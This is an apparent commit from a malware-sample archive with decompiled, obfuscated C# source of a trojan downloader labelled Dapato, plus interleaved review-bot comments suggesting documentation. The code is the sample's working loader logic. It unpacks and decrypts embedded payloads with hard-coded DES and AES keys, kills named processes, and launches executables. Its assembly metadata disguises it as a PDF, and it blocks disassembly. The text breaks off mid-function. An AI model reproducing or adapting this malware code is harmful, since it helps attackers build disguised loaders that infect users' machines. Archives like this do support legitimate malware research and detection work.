auto-decompiled msil via petikvx

add
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
@@ -0,0 +1,18 @@
using SmartAssembly.Attributes;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: PoweredBy("Powered by SmartAssembly 6.6.3.41")]
[assembly: AssemblyTitle("Objeto de arquivo PDF ©")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Arquivo PDF")]
[assembly: AssemblyCopyright("Copyright © 2012")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(false)]
[assembly: Guid("68ef6356-44bd-4a76-9d0f-4e9a5e4d8d3d")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("1.0.0.0")]
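Review bot: The `AssemblyTitle` and `AssemblyProduct` values in this file describe a PDF document ("Objeto de arquivo PDF", "Arquivo PDF"), while the "Assembly location" headers in the other files of this commit show the sample is an .exe, and nothing here marks that mismatch. A triage comment above the attributes would help, for example `// Metadata is author-supplied: title/product claim a PDF, the binary is an executable`. The `PoweredBy` and `SuppressIldasm` attributes deserve a second comment, `// SmartAssembly 6.6.3.41 markers; expect mangled identifiers and encoded strings in this assembly`, since they likely explain the `\uXXXX` names in the rest of the commit.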
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.PoweredByAttribute
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
namespace SmartAssembly.Attributes
{
public sealed class PoweredByAttribute : Attribute
{
public PoweredByAttribute(string s)
{
}
}
}
@@ -0,0 +1,58 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.MemoryManagement.MemoryManager
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace SmartAssembly.MemoryManagement
{
public sealed class MemoryManager
{
internal static MemoryManager \u0001;
private long \u0001 = DateTime.Now.Ticks;
[DllImport("kernel32", EntryPoint = "SetProcessWorkingSetSize")]
private static extern int \u0001(
IntPtr process,
int minimumWorkingSetSize,
int maximumWorkingSetSize);
private void \u0001()
{
try
{
using (Process currentProcess = Process.GetCurrentProcess())
MemoryManager.\u0001(currentProcess.Handle, -1, -1);
}
catch
{
}
}
private void \u0001(object sender, EventArgs e)
{
try
{
long ticks = DateTime.Now.Ticks;
if (ticks - this.\u0001 <= 10000000L)
return;
this.\u0001 = ticks;
this.\u0001();
}
catch
{
}
}
internal MemoryManager()
{
Application.Idle += new EventHandler(this.\u0001);
this.\u0001();
}
}
}
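Review bot: The threshold `10000000L` in the idle handler and the `-1, -1` arguments passed to `SetProcessWorkingSetSize` are undocumented, so a reader cannot tell at a glance that this class only trims the process working set. `DateTime.Ticks` counts 100 ns units, so the comparison limits the trim to once per second; a comment such as `// 10,000,000 ticks = 1 s: trim the working set at most once per second while the message loop is idle` would say so. Given the `SmartAssembly.MemoryManagement` namespace this looks like obfuscator runtime support rather than sample-specific logic, and a class-level comment stating that would save analysts time. Both `catch` blocks are empty, so a failed call leaves no trace.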
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CSPharm", "Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.csproj", "{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0145DE47-49F8-459B-B19B-8B0FF98EBB7D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,26 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0003;
using System;
using System.Reflection;
namespace \u0001
{
internal sealed class \u0001 : IDisposable
{
internal readonly Type \u0001;
internal readonly object \u0002;
public \u0001()
{
this.\u0001 = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.DESCryptoServiceProvider");
this.\u0002 = Activator.CreateInstance(this.\u0001);
}
public void \u0001() => \u0001.\u0001(this);
}
}
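Review bot: The constructor resolves `System.Security.Cryptography.DESCryptoServiceProvider` by name through `Assembly.Load(...).GetType(...)` and instantiates it with `Activator.CreateInstance`, so the cipher class is not referenced as a type here, and the class has no comment saying which algorithm it wraps. I would add `// Late-bound DES provider: \u0001 holds the Type, \u0002 the instance; members are invoked by name via reflection` above the two fields. The later file section that loads `AesManaged` with a `RijndaelManaged` fallback follows the same pattern and needs the equivalent comment. Searches for crypto use in this sample should therefore match on these type-name strings and not only on typed references.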
@@ -0,0 +1,14 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
namespace \u0002
{
internal sealed class \u0001 : Attribute
{
}
}
@@ -0,0 +1,92 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System.Runtime.InteropServices;
namespace \u0002
{
internal sealed class \u0002
{
internal static \u0002.\u0002.\u0001 \u0001;
internal static \u0002.\u0002.\u0002 \u0002;
internal static \u0002.\u0002.\u0003 \u0003;
internal static \u0002.\u0002.\u0004 \u0004;
internal static \u0002.\u0002.\u0005 \u0005;
internal static \u0002.\u0002.\u0006 \u0006;
internal static \u0002.\u0002.\u0007 \u0007;
internal static \u0002.\u0002.\u0008 \u0008;
internal static \u0002.\u0002.\u000E \u000E;
internal static \u0002.\u0002.\u000F \u000F;
internal static \u0002.\u0002.\u0010 \u0010;
internal static \u0002.\u0002.\u0011 \u0011;
internal static \u0002.\u0002.\u0012 \u0012;
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
internal struct \u0001
{
}
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
internal struct \u0002
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
internal struct \u0003
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
internal struct \u0004
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0005
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0006
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0007
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0008
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u000E
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u000F
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0010
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0011
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0012
{
}
}
}
@@ -0,0 +1,869 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0004;
using SmartAssembly.MemoryManagement;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace \u0003
{
internal sealed class \u0001
{
static void \u0001([In] byte[] obj0, [In] \u0005.\u0003.\u0004 obj1)
{
int[] numArray1 = new int[16];
int[] numArray2 = new int[16];
if (true)
goto label_26;
label_4:
int index1;
for (; index1 < obj0.Length; ++index1)
{
int index2 = (int) obj0[index1];
if (index2 > 0)
++numArray1[index2];
}
int num1 = 0;
int length = 512;
for (int index3 = 1; index3 <= 15; ++index3)
{
numArray2[index3] = num1;
num1 += numArray1[index3] << 16 - index3;
if (index3 >= 10)
{
int num2 = numArray2[index3] & 130944;
int num3 = num1 & 130944;
length += num3 - num2 >> 16 - index3;
}
}
obj1.\u0001 = new short[length];
int num4 = 512;
for (int index4 = 15; index4 >= 10; --index4)
{
int num5 = num1 & 130944;
num1 -= numArray1[index4] << 16 - index4;
for (int index5 = num1 & 130944; index5 < num5; index5 += 128)
{
obj1.\u0001[(int) \u0003.\u0001.\u0001(index5)] = (short) (-num4 << 4 | index4);
num4 += 1 << index4 - 9;
}
}
for (int index6 = 0; index6 < obj0.Length; ++index6)
{
int index7 = (int) obj0[index6];
if (index7 != 0)
{
int num6 = numArray2[index7];
int index8 = (int) \u0003.\u0001.\u0001(num6);
if (index7 <= 9)
{
do
{
obj1.\u0001[index8] = (short) (index6 << 4 | index7);
index8 += 1 << index7;
}
while (index8 < 512);
}
else
{
int num7 = (int) obj1.\u0001[index8 & 511];
int num8 = 1 << (num7 & 15);
int num9 = -(num7 >> 4);
do
{
obj1.\u0001[num9 | index8 >> 9] = (short) (index6 << 4 | index7);
index8 += 1 << index7;
}
while (index8 < num8);
}
numArray2[index7] = num6 + (1 << 16 - index7);
}
}
return;
label_26:
index1 = 0;
goto label_4;
}
static int \u0001([In] \u0005.\u0003.\u0002 obj0) => obj0.\u0005;
static bool \u0001([In] \u0005.\u0003.\u0002 obj0) => obj0.\u0002 == obj0.\u0003;
static int \u0001([In] \u0005.\u0003.\u0002 obj0, [In] int obj1)
{
if (obj0.\u0005 < obj1)
goto label_4;
label_3:
return (int) ((long) obj0.\u0004 & (long) ((1 << obj1) - 1));
label_4:
if (obj0.\u0002 == obj0.\u0003)
return -1;
obj0.\u0004 |= (uint) (((int) obj0.\u0001[obj0.\u0002++] & (int) byte.MaxValue | ((int) obj0.\u0001[obj0.\u0002++] & (int) byte.MaxValue) << 8) << obj0.\u0005);
obj0.\u0005 += 16;
goto label_3;
}
static bool \u0001([In] Assembly obj0, [In] Assembly obj1)
{
byte[] publicKey1 = obj1.GetName().GetPublicKey();
byte[] publicKey2 = obj0.GetName().GetPublicKey();
if (publicKey2 == null != (publicKey1 == null))
return false;
if (publicKey2 != null)
{
for (int index = 0; index < publicKey2.Length; ++index)
{
if ((int) publicKey2[index] != (int) publicKey1[index])
return false;
}
}
return true;
}
static int \u0001([In] \u0005.\u0003.\u0002 obj0, [In] byte[] obj1, [In] int obj2, [In] int obj3)
{
int num1 = 0;
while (obj0.\u0005 > 0 && obj3 > 0)
{
obj1[obj2++] = (byte) obj0.\u0004;
obj0.\u0004 >>= 8;
obj0.\u0005 -= 8;
--obj3;
++num1;
}
if (obj3 == 0)
return num1;
int num2 = obj0.\u0003 - obj0.\u0002;
if (obj3 > num2)
obj3 = num2;
Array.Copy((Array) obj0.\u0001, obj0.\u0002, (Array) obj1, obj2, obj3);
obj0.\u0002 += obj3;
if ((obj0.\u0002 - obj0.\u0003 & 1) != 0)
{
obj0.\u0004 = (uint) obj0.\u0001[obj0.\u0002++] & (uint) byte.MaxValue;
obj0.\u0005 = 8;
}
return num1 + obj3;
}
static void \u0001([In] \u0002 obj0) => obj0.\u0001.GetMethod("Clear").Invoke(obj0.\u0002, new object[0]);
static void \u0001([In] \u0005.\u0003.\u0002 obj0)
{
obj0.\u0004 >>= obj0.\u0005 & 7;
obj0.\u0005 &= -8;
}
static int \u0001([In] int obj0) => \u0003.\u0001.\u0001(obj0) * 2;
static bool \u0001([In] \u0005.\u0003.\u0001 obj0)
{
int num1 = \u0003.\u0001.\u0001(obj0.\u0011);
if (true)
goto label_25;
label_23:
int num2;
while (num2 >= 258)
{
switch (obj0.\u0005)
{
case 7:
int num3;
while (((num3 = \u0003.\u0001.\u0001(obj0.\u0013, obj0.\u0010)) & -256) == 0)
{
\u0003.\u0001.\u0001(obj0.\u0011, num3);
if (--num2 < 258)
return true;
}
if (num3 < 257)
{
if (num3 < 0)
return false;
obj0.\u0014 = (\u0005.\u0003.\u0004) null;
obj0.\u0013 = (\u0005.\u0003.\u0004) null;
obj0.\u0005 = 2;
return true;
}
obj0.\u0007 = \u0005.\u0003.\u0001.\u0001[num3 - 257];
obj0.\u0006 = \u0005.\u0003.\u0001.\u0002[num3 - 257];
goto case 8;
case 8:
if (obj0.\u0006 > 0)
{
obj0.\u0005 = 8;
int num4 = \u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
if (num4 < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
obj0.\u0007 += num4;
}
obj0.\u0005 = 9;
goto case 9;
case 9:
int index = \u0003.\u0001.\u0001(obj0.\u0014, obj0.\u0010);
if (index < 0)
return false;
obj0.\u0008 = \u0005.\u0003.\u0001.\u0003[index];
obj0.\u0006 = \u0005.\u0003.\u0001.\u0004[index];
goto case 10;
case 10:
if (obj0.\u0006 > 0)
{
obj0.\u0005 = 10;
int num5 = \u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
if (num5 < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, obj0.\u0006);
obj0.\u0008 += num5;
}
\u0003.\u0001.\u0001(obj0.\u0011, obj0.\u0007, obj0.\u0008);
num2 -= obj0.\u0007;
obj0.\u0005 = 7;
continue;
default:
continue;
}
}
return true;
label_25:
num2 = num1;
goto label_23;
}
static void \u0001([In] string obj0)
{
foreach (Process process in Process.GetProcessesByName(obj0))
{
\u0003.\u0001.\u0001(\u0005.\u0001.\u0001(1314) + process.ProcessName + \u0005.\u0001.\u0001(1327));
process.Kill();
}
}
static bool \u0001([In] \u0005.\u0003.\u0005 obj0, [In] \u0005.\u0003.\u0002 obj1)
{
while (true)
{
switch (obj0.\u0006)
{
case 0:
obj0.\u0007 = \u0003.\u0001.\u0001(obj1, 5);
if (obj0.\u0007 >= 0)
{
obj0.\u0007 += 257;
\u0003.\u0001.\u0001(obj1, 5);
obj0.\u0006 = 1;
goto case 1;
}
else
goto label_2;
case 1:
obj0.\u0008 = \u0003.\u0001.\u0001(obj1, 5);
if (obj0.\u0008 >= 0)
{
++obj0.\u0008;
\u0003.\u0001.\u0001(obj1, 5);
obj0.\u000F = obj0.\u0007 + obj0.\u0008;
obj0.\u0004 = new byte[obj0.\u000F];
obj0.\u0006 = 2;
goto case 2;
}
else
goto label_5;
case 2:
obj0.\u000E = \u0003.\u0001.\u0001(obj1, 4);
if (obj0.\u000E >= 0)
{
obj0.\u000E += 4;
\u0003.\u0001.\u0001(obj1, 4);
obj0.\u0003 = new byte[19];
obj0.\u0012 = 0;
obj0.\u0006 = 3;
goto case 3;
}
else
goto label_8;
case 3:
for (; obj0.\u0012 < obj0.\u000E; ++obj0.\u0012)
{
int num = \u0003.\u0001.\u0001(obj1, 3);
if (num < 0)
return false;
\u0003.\u0001.\u0001(obj1, 3);
obj0.\u0003[\u0005.\u0003.\u0005.\u0013[obj0.\u0012]] = (byte) num;
}
obj0.\u0005 = new \u0005.\u0003.\u0004(obj0.\u0003);
obj0.\u0003 = (byte[]) null;
obj0.\u0012 = 0;
obj0.\u0006 = 4;
goto case 4;
case 4:
int num1;
while (((num1 = \u0003.\u0001.\u0001(obj0.\u0005, obj1)) & -16) == 0)
{
obj0.\u0004[obj0.\u0012++] = obj0.\u0011 = (byte) num1;
if (obj0.\u0012 == obj0.\u000F)
return true;
}
if (num1 >= 0)
{
if (num1 >= 17)
obj0.\u0011 = (byte) 0;
obj0.\u0010 = num1 - 16;
obj0.\u0006 = 5;
goto case 5;
}
else
goto label_19;
case 5:
int num2 = \u0005.\u0003.\u0005.\u0002[obj0.\u0010];
int num3 = \u0003.\u0001.\u0001(obj1, num2);
if (num3 >= 0)
{
\u0003.\u0001.\u0001(obj1, num2);
int num4 = num3 + \u0005.\u0003.\u0005.\u0001[obj0.\u0010];
while (num4-- > 0)
obj0.\u0004[obj0.\u0012++] = obj0.\u0011;
if (obj0.\u0012 != obj0.\u000F)
{
obj0.\u0006 = 4;
continue;
}
goto label_29;
}
else
goto label_24;
default:
continue;
}
}
label_2:
return false;
label_5:
return false;
label_8:
return false;
label_19:
return false;
label_24:
return false;
label_29:
return true;
}
static byte[] \u0001([In] byte[] obj0)
{
Assembly callingAssembly = Assembly.GetCallingAssembly();
Assembly executingAssembly = Assembly.GetExecutingAssembly();
if ((object) callingAssembly != (object) executingAssembly && !\u0003.\u0001.\u0001(callingAssembly, executingAssembly))
return (byte[]) null;
\u0005.\u0003.\u0007 obj1 = new \u0005.\u0003.\u0007(obj0);
byte[] numArray1 = new byte[0];
int num1 = \u0003.\u0001.\u0001(obj1);
if (num1 == 67324752)
{
short num2 = (short) \u0003.\u0001.\u0001(obj1);
int num3 = \u0003.\u0001.\u0001(obj1);
int num4 = \u0003.\u0001.\u0001(obj1);
if (num1 != 67324752 || num2 != (short) 20 || num3 != 0 || num4 != 8)
throw new FormatException("Wrong Header Signature");
\u0003.\u0001.\u0001(obj1);
\u0003.\u0001.\u0001(obj1);
\u0003.\u0001.\u0001(obj1);
int length = \u0003.\u0001.\u0001(obj1);
int count1 = \u0003.\u0001.\u0001(obj1);
int count2 = \u0003.\u0001.\u0001(obj1);
if (count1 > 0)
{
byte[] buffer = new byte[count1];
obj1.Read(buffer, 0, count1);
}
if (count2 > 0)
{
byte[] buffer = new byte[count2];
obj1.Read(buffer, 0, count2);
}
byte[] buffer1 = new byte[obj1.Length - obj1.Position];
obj1.Read(buffer1, 0, buffer1.Length);
\u0005.\u0003.\u0001 obj2 = new \u0005.\u0003.\u0001(buffer1);
numArray1 = new byte[length];
\u0003.\u0001.\u0001(numArray1, numArray1.Length, obj2, 0);
}
else
{
int num5 = num1 >> 24;
if (num1 - (num5 << 24) != 8223355)
throw new FormatException("Unknown Header");
if (num5 == 1)
{
int length1 = \u0003.\u0001.\u0001(obj1);
numArray1 = new byte[length1];
int num6;
for (int index = 0; index < length1; index += num6)
{
int length2 = \u0003.\u0001.\u0001(obj1);
num6 = \u0003.\u0001.\u0001(obj1);
byte[] buffer = new byte[length2];
obj1.Read(buffer, 0, buffer.Length);
\u0005.\u0003.\u0001 obj3 = new \u0005.\u0003.\u0001(buffer);
\u0003.\u0001.\u0001(numArray1, num6, obj3, index);
}
}
if (num5 == 2)
{
byte[] numArray2 = new byte[8]
{
(byte) 203,
(byte) 141,
(byte) 238,
(byte) 96,
(byte) 34,
(byte) 246,
(byte) 159,
(byte) 67
};
byte[] numArray3 = new byte[8]
{
(byte) 138,
(byte) 87,
(byte) 245,
(byte) 25,
(byte) 232,
(byte) 206,
(byte) 94,
(byte) 109
};
using (\u0001.\u0001 obj4 = new \u0001.\u0001())
{
using (ICryptoTransform cryptoTransform = \u0003.\u0001.\u0001(numArray3, obj4, numArray2, true))
numArray1 = \u0003.\u0001.\u0001(cryptoTransform.TransformFinalBlock(obj0, 4, obj0.Length - 4));
}
}
if (num5 == 3)
{
byte[] numArray4 = new byte[16]
{
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1,
(byte) 1
};
byte[] numArray5 = new byte[16]
{
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2,
(byte) 2
};
using (\u0002 obj5 = new \u0002())
{
using (ICryptoTransform cryptoTransform = \u0003.\u0001.\u0001(numArray4, obj5, true, numArray5))
numArray1 = \u0003.\u0001.\u0001(cryptoTransform.TransformFinalBlock(obj0, 4, obj0.Length - 4));
}
}
}
obj1.Close();
return numArray1;
}
static int \u0001([In] \u0005.\u0003.\u0004 obj0, [In] \u0005.\u0003.\u0002 obj1)
{
int index1;
if ((index1 = \u0003.\u0001.\u0001(obj1, 9)) < 0)
{
int num1 = obj1.\u0005;
int index2 = \u0003.\u0001.\u0001(obj1, num1);
int num2 = (int) obj0.\u0001[index2];
if (num2 < 0 || (num2 & 15) > num1)
return -1;
\u0003.\u0001.\u0001(obj1, num2 & 15);
return num2 >> 4;
}
\u0005.\u0003.\u0004 obj = obj0;
int num3;
if ((num3 = (int) obj.\u0001[index1]) >= 0)
{
\u0003.\u0001.\u0001(obj1, num3 & 15);
return num3 >> 4;
}
int num4 = -(num3 >> 4);
int num5 = num3 & 15;
int num6;
if ((num6 = \u0003.\u0001.\u0001(obj1, num5)) >= 0)
{
int num7 = (int) obj0.\u0001[num4 | num6 >> 9];
\u0003.\u0001.\u0001(obj1, num7 & 15);
return num7 >> 4;
}
int num8 = obj1.\u0005;
int num9 = \u0003.\u0001.\u0001(obj1, num8);
int num10 = (int) obj0.\u0001[num4 | num9 >> 9];
if ((num10 & 15) > num8)
return -1;
\u0003.\u0001.\u0001(obj1, num10 & 15);
return num10 >> 4;
}
static void \u0001([In] \u0005.\u0003.\u0003 obj0, [In] int obj1, [In] int obj2)
{
if ((obj0.\u0003 += obj1) > 32768)
throw new InvalidOperationException();
int sourceIndex = obj0.\u0002 - obj2 & (int) short.MaxValue;
int num = 32768 - obj1;
if (sourceIndex <= num && obj0.\u0002 < num)
{
if (obj1 <= obj2)
{
Array.Copy((Array) obj0.\u0001, sourceIndex, (Array) obj0.\u0001, obj0.\u0002, obj1);
obj0.\u0002 += obj1;
}
else
{
while (obj1-- > 0)
obj0.\u0001[obj0.\u0002++] = obj0.\u0001[sourceIndex++];
}
}
else
\u0003.\u0001.\u0001(obj0, sourceIndex, obj1, obj2);
}
static void \u0001([In] string obj0)
{
\u0003.\u0001.\u0001(\u0005.\u0001.\u0001(1332) + obj0 + \u0005.\u0001.\u0001(1327));
try
{
Process.Start(obj0);
}
catch (Exception ex1)
{
if (!(ex1.GetType().ToString() != \u0005.\u0001.\u0001(1353)))
return;
try
{
Process.Start(new ProcessStartInfo(\u0005.\u0001.\u0001(1402), obj0));
}
catch (Exception ex2)
{
}
}
}
static \u0005.\u0003.\u0004 \u0001([In] \u0005.\u0003.\u0005 obj0)
{
byte[] numArray = new byte[obj0.\u0008];
byte[] destinationArray;
if (true)
destinationArray = numArray;
Array.Copy((Array) obj0.\u0004, obj0.\u0007, (Array) destinationArray, 0, obj0.\u0008);
return new \u0005.\u0003.\u0004(destinationArray);
}
static int \u0001([In] int obj0)
{
int num = 1;
for (int index = 0; index < 10; ++index)
num += obj0;
return num;
}
static ICryptoTransform \u0001(
[In] byte[] obj0,
[In] \u0001.\u0001 obj1,
[In] byte[] obj2,
[In] bool obj3)
{
obj1.\u0001.GetProperty("Key").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj2
});
obj1.\u0001.GetProperty("IV").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj0
});
return (ICryptoTransform) obj1.\u0001.GetMethod(obj3 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(obj1.\u0002, new object[0]);
}
static void \u0001([In] string obj0)
{
if (!\u0004.\u0001.\u0004)
return;
StreamWriter streamWriter = File.Exists(\u0005.\u0001.\u0001(1419)) ? File.AppendText(\u0005.\u0001.\u0001(1419)) : new StreamWriter(\u0005.\u0001.\u0001(1419));
streamWriter.WriteLine((object) DateTime.Now);
streamWriter.WriteLine(obj0);
streamWriter.WriteLine();
streamWriter.Close();
}
static int \u0001([In] int obj0, [In] int obj1, [In] byte[] obj2, [In] \u0005.\u0003.\u0003 obj3)
{
int num1 = obj3.\u0002;
if (obj0 > obj3.\u0003)
obj0 = obj3.\u0003;
else
num1 = obj3.\u0002 - obj3.\u0003 + obj0 & (int) short.MaxValue;
int num2 = obj0;
int length = obj0 - num1;
if (length > 0)
{
Array.Copy((Array) obj3.\u0001, 32768 - length, (Array) obj2, obj1, length);
obj1 += length;
obj0 = num1;
}
Array.Copy((Array) obj3.\u0001, num1 - obj0, (Array) obj2, obj1, obj0);
obj3.\u0003 -= num2;
if (obj3.\u0003 < 0)
throw new InvalidOperationException();
return num2;
}
static short \u0001([In] int obj0) => (short) ((int) \u0005.\u0003.\u0006.\u0002[obj0 & 15] << 12 | (int) \u0005.\u0003.\u0006.\u0002[obj0 >> 4 & 15] << 8 | (int) \u0005.\u0003.\u0006.\u0002[obj0 >> 8 & 15] << 4 | (int) \u0005.\u0003.\u0006.\u0002[obj0 >> 12]);
static int \u0001([In] \u0005.\u0003.\u0003 obj0) => obj0.\u0003;
static ICryptoTransform \u0001(
[In] byte[] obj0,
[In] \u0002 obj1,
[In] bool obj2,
[In] byte[] obj3)
{
obj1.\u0001.GetProperty("Key").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj0
});
obj1.\u0001.GetProperty("IV").GetSetMethod().Invoke(obj1.\u0002, new object[1]
{
(object) obj3
});
return (ICryptoTransform) obj1.\u0001.GetMethod(obj2 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(obj1.\u0002, new object[0]);
}
static void \u0001([In] \u0001.\u0001 obj0) => obj0.\u0001.GetMethod("Clear").Invoke(obj0.\u0002, new object[0]);
static void \u0001([In] \u0005.\u0003.\u0003 obj0, [In] int obj1)
{
\u0005.\u0003.\u0003 obj = obj0;
int num1;
int num2 = num1 = obj.\u0003;
obj.\u0003 = num1 + 1;
if (num2 == 32768)
throw new InvalidOperationException();
obj0.\u0001[obj0.\u0002++] = (byte) obj1;
obj0.\u0002 &= (int) short.MaxValue;
}
static void \u0001([In] \u0005.\u0003.\u0002 obj0, [In] int obj1)
{
obj0.\u0004 >>= obj1;
obj0.\u0005 -= obj1;
}
static int \u0001([In] \u0005.\u0003.\u0002 obj0) => obj0.\u0003 - obj0.\u0002 + (obj0.\u0005 >> 3);
static \u0005.\u0003.\u0004 \u0001([In] \u0005.\u0003.\u0005 obj0)
{
byte[] destinationArray = new byte[obj0.\u0007];
Array.Copy((Array) obj0.\u0004, 0, (Array) destinationArray, 0, obj0.\u0007);
return new \u0005.\u0003.\u0004(destinationArray);
}
static void \u0001([In] int obj0, [In] int obj1, [In] byte[] obj2, [In] \u0005.\u0003.\u0002 obj3)
{
if (obj3.\u0002 < obj3.\u0003)
throw new InvalidOperationException();
int num = obj1 + obj0;
if (0 > obj1 || obj1 > num || num > obj2.Length)
throw new ArgumentOutOfRangeException();
if ((obj0 & 1) != 0)
{
obj3.\u0004 |= (uint) (((int) obj2[obj1++] & (int) byte.MaxValue) << obj3.\u0005);
obj3.\u0005 += 8;
}
obj3.\u0001 = obj2;
obj3.\u0002 = obj1;
obj3.\u0003 = num;
}
static int \u0001([In] byte[] obj0, [In] int obj1, [In] \u0005.\u0003.\u0001 obj2, [In] int obj3)
{
int num1 = 0;
do
{
if (obj2.\u0005 != 11)
goto label_5;
label_2:
continue;
label_5:
int num2 = \u0003.\u0001.\u0001(obj1, obj3, obj0, obj2.\u0011);
obj3 += num2;
num1 += num2;
obj1 -= num2;
if (obj1 != 0)
goto label_2;
else
goto label_1;
}
while (\u0003.\u0001.\u0001(obj2) || obj2.\u0011.\u0003 > 0 && obj2.\u0005 != 11);
goto label_3;
label_1:
return num1;
label_3:
return num1;
}
static void \u0001()
{
try
{
if (Environment.OSVersion.Platform != PlatformID.Win32NT)
return;
MemoryManager.\u0001 = new MemoryManager();
}
catch
{
}
}
static int \u0001([In] \u0005.\u0003.\u0003 obj0, [In] \u0005.\u0003.\u0002 obj1, [In] int obj2)
{
